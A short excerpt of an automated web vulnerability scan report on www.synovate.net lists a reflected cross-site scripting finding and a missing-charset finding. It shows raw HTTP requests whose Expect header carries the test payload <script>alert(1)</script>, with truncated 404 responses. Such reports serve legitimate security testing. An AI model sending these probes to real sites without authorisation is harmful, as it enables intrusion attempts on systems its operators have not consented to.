1. Cross-site scripting (reflected)
2. HTML does not specify charset
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://www.synovate.net |
| Path: | /favicon.ico |
| GET /favicon.ico HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.synovate.net Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> Referer: http://www.google.com |
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/3.5 Date: Fri, 01 Apr 2011 03:19:55 GMT Content-type: text/html Content-length: 363 <TITLE>Not Found</TITLE><H1>Not Found</H1> The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you ha ...[SNIP]... <A HREF="http://www.google ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | http://www.synovate.net |
| Path: | /favicon.ico |
| GET /favicon.ico HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.synovate.net Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/3.5 Date: Fri, 01 Apr 2011 03:19:33 GMT Content-type: text/html Content-length: 207 <TITLE>Not Found</TITLE><H1>Not Found</H1> The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you ha ...[SNIP]... |